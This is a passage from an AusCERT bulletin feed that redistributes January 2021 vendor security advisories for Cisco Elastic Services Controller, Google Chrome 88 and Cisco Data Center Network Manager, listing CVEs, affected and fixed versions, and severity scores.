Security Vulnerability Policy . This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco. URL o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esa-wsa-sma-info-RHp44vAC Revision History o +----------+---------------------------+----------+--------+--------------+ | Version | Description | Section | Status | Date | +----------+---------------------------+----------+--------+--------------+ | 1.0 | Initial public release. | - | Final | 2021-JAN-20 | +----------+---------------------------+----------+--------+--------------+ - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBYAka9+NLKJtyKPYoAQh5gg//SG3qLTcagdxpSQ8AlgnKo974Yi8avvkP tJcHzxqA+NkgXTbY4ughYLJ+oGtkntNDM0MEu0lSI57EuADG0s6JCVYlcKA/qz2x iHmOFd6LB33SutFkQscJKh91YStVCnTtLXL2g+/Fo/KbgR+PI+8XV77E1FpE9pu7 eOiPW/vF7+w0DZOdbphuKZVL3D+A8yWMUGQfHhBTUKxFJIrrFOVCKv78ibt/DkYJ FOdcdetdzH/U1NoZMDuDEq83DxAqA8fE+zRh3ZJ1E+PgKxX940kJ4S9HDvDbhy8D NfbwV/HPma9yM0/F74wK/W6LOsNauhcBdhS5hlypwD8ehLxIy+ZMisQgAJmK2FtY an/MC7RvwFzBUY+Qou3RBwQXDxVfT9wkp6y5t2+zxUToaAaWEMIHHMunZJwt2ZW9 sAPAzSa1LiGpOMNf7tfryGMVIh+MYgOdsgmkjsH4G52ORo7fAfo3ljwYPGmw3lpp +VBTf8DXIm50yS/Pjyk5/hEAuY1QIMzujZW2whOhRBMEBtzZCrgatSHluhUg1yYz iz99iUtoJoPM4ZymqKJOrRgE5Bum7EMITnkTXyLnm5FEhhN/mo1ueLIQYK5Wxb4m KSSK5BuDyErazGQYVKMM2Mcty44ts7ejwVzRZ/273BFftVmwSiby+QnqDf6enHgc z0Tal6ZgcRY= =aivf -----END PGP SIGNATURE-----
AusCERT - Security Bulletins · 2021. január 21.

ESB-2021.0248 - [Cisco] Cisco Elastic Services Controller: Denial of service - Remote/unauthenticated

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2021.0248 Cisco Elastic Services Controller Denial of Service Vulnerability 21 January 2021 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Cisco Elastic Services Controller Publisher: Cisco Systems Operating System: Cisco Impact/Access: Denial of Service -- Remote/Unauthenticated Resolution: Patch/Upgrade CVE Names: CVE-2021-1312 Original Bulletin: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esc-dos-4Gw6D527 - --------------------------BEGIN INCLUDED TEXT-------------------- Cisco Elastic Services Controller Denial of Service Vulnerability Priority: Medium Advisory ID: cisco-sa-esc-dos-4Gw6D527 First Published: 2021 January 20 16:00 GMT Version 1.0: Final Workarounds: No workarounds available Cisco Bug IDs: CSCvv69484 CVE Names: CVE-2021-1312 CWEs: CWE-400 Summary o A vulnerability in the system resource management of Cisco Elastic Services Controller (ESC) could allow an unauthenticated, remote attacker to cause a denial of service (DoS) to the health monitor API on an affected device. The vulnerability is due to inadequate provisioning of kernel parameters for the maximum number of TCP connections and SYN backlog. An attacker could exploit this vulnerability by sending a flood of crafted TCP packets to an affected device. A successful exploit could allow the attacker to block TCP listening ports that are used by the health monitor API. This vulnerability only affects customers who use the health monitor API. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esc-dos-4Gw6D527 Affected Products o Vulnerable Products At the time of publication, this vulnerability affected Cisco ESC releases 5.3.0.94 and earlier. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Products Confirmed Not Vulnerable Only products listed in the Vulnerable Products section of this advisory are known to be affected by this vulnerability. Workarounds o There are no workarounds that address this vulnerability. Fixed Software o When considering software upgrades , customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page , to determine exposure and a complete upgrade solution. In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers. Fixed Releases At the time of publication, Cisco ESC releases 5.3.0.102 and later contained the fix for this vulnerability. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Exploitation and Public Announcements o The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory. Source o This vulnerability was found during internal security testing. Cisco Security Vulnerability Policy o To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy . This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco. URL o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esc-dos-4Gw6D527 Revision History o +----------+---------------------------+----------+--------+--------------+ | Version | Description | Section | Status | Date | +----------+---------------------------+----------+--------+--------------+ | 1.0 | Initial public release. | - | Final | 2021-JAN-20 | +----------+---------------------------+----------+--------+--------------+ - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBYAkaDeNLKJtyKPYoAQhgew/6AyMzwGdEcWmz4D4uyCvPbSlpCVpd7K+T vE3o4sj3hA8G0ChswDV+LieHyMaMMmfDyoNGml53mh4LVz/hTb4p5xmwW5XvJa65 CetuYvgnItSewWCk6CwkzNAFDJeGBaEDc9dJWgUH7utv7mCerBFhXlofCRmbqEVQ aX4GNqmXPguiXt3fgI1mUGfRpEUkyoPxN0FShN0Hd3qGTaBoAEiTQC5svgm2WqQ7 qRHiBRSx/KPbl2h4QCHx88dLUM4RwWJL91IpTOH6LuH1xUizTbIH6PqB79gKs8TT 8m1xhr6tovD5JCs0wctBODmb78gnmAcvqgW9mn7m+oca4dqIMWoObUcImRkoXUNj Lh8NAsR64TeRmHDwttC8EGPWLOncwDqUmOaYA/VU25sXW+T9Go1cr77t1BNjSyqR ukK6cIUUT6acPizFcU8WA9eNl/xAFWpjCvD5gcFsnQKBV6ac9B+SFQwKKJrhxEY4 YoTu3UtjEbMWOhNSR/P1zd8xmVLR/Zyy1DMiXD+zzPMZY4oeUVvmdFM9uKOQ+s27 af6mcoJfJkctJve+KP7oLV3iWPtqOqwPPtpWJd7DOM/c+QsGMxP31C/awTGoDApJ cS7Ceq7pFYpkmVogzUmDIlmKysSa91ngnBZsjNgGGZBC5BVDC/YviYXUngCYQdzE LOBJQYEaxyE= =c/7l -----END PGP SIGNATURE-----
AusCERT - Security Bulletins · 2021. január 21.

ESB-2021.0247 - [Win][UNIX/Linux] Google Chrome: Multiple vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2021.0247 Stable Channel Update for Desktop 21 January 2021 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Google Chrome Publisher: Google Operating System: Windows UNIX variants (UNIX, Linux, OSX) Impact/Access: Execute Arbitrary Code/Commands -- Remote with User Interaction Denial of Service -- Remote with User Interaction Access Confidential Data -- Remote with User Interaction Unauthorised Access -- Remote with User Interaction Reduced Security -- Remote with User Interaction Resolution: Patch/Upgrade CVE Names: CVE-2021-21141 CVE-2021-21140 CVE-2021-21139 CVE-2021-21138 CVE-2021-21137 CVE-2021-21136 CVE-2021-21135 CVE-2021-21134 CVE-2021-21133 CVE-2021-21132 CVE-2021-21131 CVE-2021-21130 CVE-2021-21129 CVE-2021-21128 CVE-2021-21127 CVE-2021-21126 CVE-2021-21125 CVE-2021-21124 CVE-2021-21123 CVE-2021-21122 CVE-2021-21121 CVE-2021-21120 CVE-2021-21119 CVE-2021-21118 CVE-2021-21117 CVE-2020-16044 Reference: ESB-2021.0242 ESB-2021.0209 ESB-2021.0201 ESB-2021.0128 ESB-2021.0093 ESB-2021.0081 Original Bulletin: https://chromereleases.googleblog.com/2021/01/stable-channel-update-for-desktop_19.html - --------------------------BEGIN INCLUDED TEXT-------------------- Stable Channel Update for Desktop Tuesday, January 19, 2021 The Chrome team is delighted to announce the promotion of Chrome 88 to the stable channel for Windows, Mac and Linux. This will roll out over the coming days/weeks. Chrome 88.0.4324.96 contains a number of fixes and improvements -- a list of changes is available in the log. Watch out for upcoming Chrome and Chromium blog posts about new features and big efforts delivered in 88 Security Fixes and Rewards Note: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed. This update includes 36 security fixes. Below, we highlight fixes that were contributed by external researchers. Please see the Chrome Security Page for more information. [$30000][1137179] Critical CVE-2021-21117: Insufficient policy enforcement in Cryptohome. Reported by Rory McNamara on 2020-10-10 [$16000][1161357] High CVE-2021-21118: Insufficient data validation in V8. Reported by Tyler Nighswander (@tylerni7) of Theori on 2020-12-23 [$5000][1160534] High CVE-2021-21119: Use after free in Media. Reported by Anonymous on 2020-12-20 [$5000][1160602] High CVE-2021-21120: Use after free in WebSQL. Reported by Nan Wang(@eternalsakura13) and Guang Gong of 360 Alpha Lab on 2020-12-21 [$5000][1161143] High CVE-2021-21121: Use after free in Omnibox. Reported by Leecraso and Guang Gong of 360 Alpha Lab on 2020-12-22 [$5000][1162131] High CVE-2021-21122: Use after free in Blink. Reported by Renata Hodovan on 2020-12-28 [$1000][1137247] High CVE-2021-21123: Insufficient data validation in File System API. Reported by Maciej Pulikowski on 2020-10-11 [$N/A][1131346] High CVE-2021-21124: Potential user after free in Speech Recognizer. Reported by Chaoyang Ding(@V4kst1z) from Codesafe Team of Legendsec at Qi'anxin Group on 2020-09-23 [$N/A][1152327] High CVE-2021-21125: Insufficient policy enforcement in File System API. Reported by Ron Masas (Imperva) on 2020-11-24 [$N/A][1163228] High CVE-2020-16044: Use after free in WebRTC. Reported by Ned Williamson of Project Zero on 2021-01-05 [$3000][1108126] Medium CVE-2021-21126: Insufficient policy enforcement in extensions. Reported by David Erceg on 2020-07-22 [$3000][1115590] Medium CVE-2021-21127: Insufficient policy enforcement in extensions. Reported by Jasminder Pal Singh, Web Services Point WSP, Kotkapura on 2020-08-12 [$2000][1138877] Medium CVE-2021-21128: Heap buffer overflow in Blink. Reported by Liang Dong on 2020-10-15 [$1000][1140403] Medium CVE-2021-21129: Insufficient policy enforcement in File System API. Reported by Maciej Pulikowski on 2020-10-20 [$1000][1140410] Medium CVE-2021-21130: Insufficient policy enforcement in File System API. Reported by Maciej Pulikowski on 2020-10-20 [$1000][1140417] Medium CVE-2021-21131: Insufficient policy enforcement in File System API. Reported by Maciej Pulikowski on 2020-10-20 [$TBD][1128206] Medium CVE-2021-21132: Inappropriate implementation in DevTools. Reported by David Erceg on 2020-09-15 [$TBD][1157743] Medium CVE-2021-21133: Insufficient policy enforcement in Downloads. Reported by wester0x01(https://twitter.com/wester0x01) on 2020-12-11 [$TBD][1157800] Medium CVE-2021-21134: Incorrect security UI in Page Info. Reported by wester0x01(https://twitter.com/wester0x01) on 2020-12-11 [$TBD][1157818] Medium CVE-2021-21135: Inappropriate implementation in Performance API. Reported by ndevtk on 2020-12-11 [$2000][1038002] Low CVE-2021-21136: Insufficient policy enforcement in WebView. Reported by Shiv Sahni, Movnavinothan V and Imdad Mohammed on 2019-12-27 [$500][1093791] Low CVE-2021-21137: Inappropriate implementation in DevTools. Reported by bobblybear on 2020-06-11 [$500][1122487] Low CVE-2021-21138: Use after free in DevTools. Reported by Weipeng Jiang (@Krace) from Codesafe Team of Legendsec at Qi'anxin Group on 2020-08-27 [$N/A][937131] Low CVE-2021-21139: Inappropriate implementation in iframe sandbox. Reported by Jun Kokatsu, Microsoft Browser Vulnerability Research on 2019-03-01 [$N/A][1136327] Low CVE-2021-21140: Uninitialized Use in USB. Reported by David Manouchehri on 2020-10-08 [$N/A][1140435] Low CVE-2021-21141: Insufficient policy enforcement in File System API. Reported by Maciej Pulikowski on 2020-10-20 We would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel.As usual, our ongoing internal security work was responsible for a wide range of fixes: o [1168217] Various fixes from internal audits, fuzzing and other initiatives Many of our security bugs are detected using AddressSanitizer, MemorySanitizer, UndefinedBehaviorSanitizer, Control Flow Integrity, libFuzzer, or AFL. - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBYAkYAeNLKJtyKPYoAQj4GA/+LsTvtvD3JncNDyJh40fpYCanvX8DSRyE Y9PhNCnOFfjRIsmaFnFSMnB+9Bs/JvHjDL43RqdJAVOCyxO7bsYPnlgpGUrTu3Sd gs1hls1ATP43Xx/wvqzwgoqKPBxSIJTe+cK7O8f48rnbT88MGH/wXqFpcs2SLRvL 0zgq4UsgKDV0dWbQ8C4OlZEhUa+sskgC6CIs50mRZ3vDU4NI/B2iPA1HBlNslh+3 wToXGx6dCglanPIL36ZW/aj1SLPT4I4nckQEOOl5puAMZEbnGdBMLQaPx59BcQyA asiiIJoQ/HswjH82RDHDVQkVzCWVWFdtp4VeN9BsHbL+TK0qKdownqHMfoGE/Ofv uZUT1VQmwmRnDRweY78W3Cg3lpRFHKMvMiHAxPOXD/pLZfeLo+Z0jAccEbiWw+I3 tWsubUeytKpcSASDLVGT2VmWFCPKVVR94ASpWpIeIYS+fDmLv6biRuni4y+M6VuU WXx5b7tRo/hxqKukP/1ASn2DUko6QEa7Dv1MGAQWmT9PTJAnGH9IkFbByByp+Zpz Nk3/uf1OUYXzZG6fhiwy9GHuZxN15D9NyM5kwh8bCa3KfXnFWb11eP9hCHabftB6 yytl6sd3hDOPDODC3q/PxxMoVoF4j6vqBWxnotm1J5F9ydefmm2hZ3gedAeitGN9 oFBqjpGE0iY= =oPvY -----END PGP SIGNATURE-----
AusCERT - Security Bulletins · 2021. január 21.

ESB-2021.0246 - [Cisco] Cisco Data Center Network Manager: Multiple vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2021.0246 Cisco Data Center Network Manager multiple vulnerabilities 21 January 2021 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Cisco Data Center Network Manager Publisher: Cisco Systems Operating System: Cisco Impact/Access: Execute Arbitrary Code/Commands -- Remote with User Interaction Modify Arbitrary Files -- Existing Account Delete Arbitrary Files -- Existing Account Cross-site Scripting -- Remote with User Interaction Access Confidential Data -- Remote/Unauthenticated Reduced Security -- Remote/Unauthenticated Unauthorised Access -- Existing Account Resolution: Patch/Upgrade CVE Names: CVE-2021-1286 CVE-2021-1283 CVE-2021-1277 CVE-2021-1276 CVE-2021-1272 CVE-2021-1270 CVE-2021-1269 CVE-2021-1255 CVE-2021-1253 CVE-2021-1250 CVE-2021-1249 CVE-2021-1248 CVE-2021-1247 CVE-2021-1135 CVE-2021-1133 CVE-2020-1276 Reference: ASB-2020.0107 ESB-2020.3874 ESB-2020.3402 ESB-2020.3063 ESB-2020.2532 ESB-2020.2009.3 ESB-2020.1899 Original Bulletin: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-authbypass-OHBPbxu https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-cert-check-BdZZV9T3 https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-info-disc-QCSJB6YG https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-api-path-TpTApx2p https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-sql-inj-OAQOObP https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-ssrf-F2vX6q5p https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-xss-vulns-GuUJ39gh Comment: This bulletin contains seven (7) Cisco Systems security advisories. - --------------------------BEGIN INCLUDED TEXT-------------------- Cisco Data Center Network Manager Authorization Bypass Vulnerabilities Priority: Medium Advisory ID: cisco-sa-dcnm-authbypass-OHBPbxu First Published: 2021 January 20 16:00 GMT Version 1.0: Final Workarounds: No workarounds available Cisco Bug IDs: CSCvu57868 CSCvv87627 CVE Names: CVE-2021-1269 CVE-2021-1270 Summary o Multiple vulnerabilities in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker to view, modify, and delete data without proper authorization. For more information about these vulnerabilities, see the Details section of this advisory. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-authbypass-OHBPbxu Affected Products o Vulnerable Products At the time of publication, these vulnerabilities affected Cisco DCNM releases earlier than Release 11.5(1). See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Products Confirmed Not Vulnerable Only products listed in the Vulnerable Products section of this advisory are known to be affected by these vulnerabilities. Details o The vulnerabilities are not dependent on one another; exploitation of one of the vulnerabilities is not required to exploit the other vulnerability. In addition, a software release that is affected by one of the vulnerabilities may not be affected by the other vulnerability. Details about the vulnerabilities are as follows: CVE-2021-1270: Cisco DCNM Authorization Bypass Vulnerability A vulnerability in the web-based management interface of Cisco DCNM could allow an authenticated, remote attacker to modify the configuration without proper authorization. This vulnerability is due to a failure to limit access to resources that are intended for users with Administrator privileges. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow a low-privileged attacker to edit the configuration. To exploit this vulnerability, an attacker would need valid nonadministrative credentials. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Bug ID(s): CSCvv87627 CVE-ID: CVE-2021-1270 Security Impact Rating (SIR): Medium CVSS Base Score: 7.1 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L CVE-2021-1269: Cisco DCNM Authorization Bypass Vulnerability A vulnerability in the web-based management interface of Cisco DCNM could allow an authenticated, remote attacker to bypass authorization on an affected device and access sensitive information that is related to the device. This vulnerability is due to a failure to limit access to resources that are intended for users with Administrator privileges. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow a low-privileged attacker to list, view, create, edit, and delete specific system configurations in the same manner as a user with Administrator privileges. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Bug ID(s): CSCvu57868 CVE-ID: CVE-2021-1269 Security Impact Rating (SIR): Medium CVSS Base Score: 6.3 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L Workarounds o There are no workarounds that address these vulnerabilities. Fixed Software o When considering software upgrades , customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page , to determine exposure and a complete upgrade solution. In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers. Fixed Releases At the time of publication, Cisco DCNM releases 11.5(1) and later contained the fix for these vulnerabilities. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Exploitation and Public Announcements o The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory. Source o These vulnerabilities were found during internal security testing. Cisco Security Vulnerability Policy o To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy . This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco. URL o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-authbypass-OHBPbxu Revision History o +----------+---------------------------+----------+--------+--------------+ | Version | Description | Section | Status | Date | +----------+---------------------------+----------+--------+--------------+ | 1.0 | Initial public release. | - | Final | 2021-JAN-20 | +----------+---------------------------+----------+--------+--------------+ - -------------------------------------------------------------------------------- Cisco Data Center Network Manager Certificate Validation Vulnerabilities Priority: High Advisory ID: cisco-sa-dcnm-cert-check-BdZZV9T3 First Published: 2021 January 20 16:00 GMT Version 1.0: Final Workarounds: No workarounds available Cisco Bug IDs: CSCvv35346 CSCvv35348 CSCvv35354 CSCvv82441 CVE Names: CVE-2021-1276 CVE-2021-1277 CWEs: CWE-295 Summary o Multiple vulnerabilities in Cisco Data Center Network Manager (DCNM) could allow an attacker to spoof a trusted host or construct a man-in-the-middle attack to extract sensitive information or alter certain API requests. These vulnerabilities are due to insufficient certificate validation when establishing HTTPS requests with the affected device. For more information about these vulnerabilities, see the Details section of this advisory. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-cert-check-BdZZV9T3 Affected Products o Vulnerable Products These vulnerabilities affect Cisco Data Center Network Manager releases earlier than 11.5(1). Products Confirmed Not Vulnerable Only products listed in the Vulnerable Products section of this advisory are known to be affected by these vulnerabilities. Details o The vulnerabilities are not dependent on one another; exploitation of one of the vulnerabilities is not required to exploit the other vulnerability. In addition, a software release that is affected by one of the vulnerabilities may not be affected by the other vulnerability. Details about the vulnerabilities are as follows: CVE-2020-1276: Cisco Data Center Network Manager Certificate Validation Vulnerability A vulnerability in the Device Manager application of Cisco DCNM could allow an unauthenticated, remote attacker to modify a specific API request that is used to verify a user's authentication token. This vulnerability is due to a lack of validation of the SSL certificate used when establishing a connection to the Device Manager application. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to alter a specific API request. Bug ID(s): CSCvv82441 CVE ID: CVE-2021-1276 Security Impact Rating (SIR): High CVSS Base Score: 7.5 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N CVE-2021-1277: Cisco Data Center Network Manager Certificate Validation Vulnerability A vulnerability in Cisco DCNM could allow an unauthenticated, remote attacker to spoof a trusted host or construct a man-in-the-middle attack to extract sensitive information from the affected device. This vulnerability is due to a lack of certificate validation. An attacker could exploit this vulnerability by using a crafted X.509 certificate and could then intercept communications. A successful exploit could allow the attacker to view and alter potentially sensitive information that DCNM maintains about clients that are connected to the network. Bug ID(s): CSCvv35348 , CSCvv35346 , CSCvv35354 CVE ID: CVE-2021-1277 Security Impact Rating (SIR): Medium CVSS Base Score: 6.5 CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N Workarounds o There are no workarounds that address these vulnerabilities. Fixed Software o Cisco has released free software updates that address the vulnerabilities described in this advisory. Customers may only install and expect support for software versions and feature sets for which they have purchased a license. By installing, downloading, accessing, or otherwise using such software upgrades, customers agree to follow the terms of the Cisco software license: https://www.cisco.com/c/en/us/products/end-user-license-agreement.html Additionally, customers may only download software for which they have a valid license, procured from Cisco directly, or through a Cisco authorized reseller or partner. In most cases this will be a maintenance upgrade to software that was previously purchased. Free security software updates do not entitle customers to a new software license, additional software feature sets, or major revision upgrades. When considering software upgrades , customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page , to determine exposure and a complete upgrade solution. In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers. Customers Without Service Contracts Customers who purchase directly from Cisco but do not hold a Cisco service contract and customers who make purchases through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should obtain upgrades by contacting the Cisco TAC: https://www.cisco.com/c /en/us/support/web/tsd-cisco-worldwide-contacts.html Customers should have the product serial number available and be prepared to provide the URL of this advisory as evidence of entitlement to a free upgrade. Fixed Releases Cisco fixed these vulnerabilities in Cisco DCNM releases 11.5(1) and later. Exploitation and Public Announcements o The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory. Source o These vulnerabilities were found during internal security testing. Cisco Security Vulnerability Policy o To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy . This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco. URL o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-cert-check-BdZZV9T3 Revision History o +----------+---------------------------+----------+--------+--------------+ | Version | Description | Section | Status | Date | +----------+---------------------------+----------+--------+--------------+ | 1.0 | Initial public release. | - | Final | 2021-JAN-20 | +----------+---------------------------+----------+--------+--------------+ - -------------------------------------------------------------------------------- Cisco Data Center Network Manager Information Disclosure Vulnerability Priority: Medium Advisory ID: cisco-sa-dcnm-info-disc-QCSJB6YG First Published: 2021 January 20 16:00 GMT Version 1.0: Final Workarounds: No workarounds available Cisco Bug IDs: CSCvv07941 CSCvv07942 CSCvv07945 CSCvv07947 CVE Names: CVE-2021-1283 CWEs: CWE-789 Summary o A vulnerability in the logging subsystem of Cisco Data Center Network Manager (DCNM) could allow an authenticated, local attacker to view sensitive information in a system log file that should be restricted. The vulnerability exists because sensitive information is not properly masked before it is written to system log files. An attacker could exploit this vulnerability by authenticating to an affected device and inspecting a specific system log file. A successful exploit could allow the attacker to view sensitive information in the system log file. To exploit this vulnerability, the attacker would need to have valid user credentials. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-info-disc-QCSJB6YG Affected Products o Vulnerable Products At the time of publication, this vulnerability affected Cisco DCNM releases earlier than Release 11.5(1). See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Products Confirmed Not Vulnerable Only products listed in the Vulnerable Products section of this advisory are known to be affected by this vulnerability. Workarounds o There are no workarounds that address this vulnerability. Fixed Software o When considering software upgrades , customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page , to determine exposure and a complete upgrade solution. In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers. Fixed Releases At the time of publication, Cisco DCNM releases 11.5(1) and later contained the fix for this vulnerability. See the Details section in the bug ID(s) at the top of this 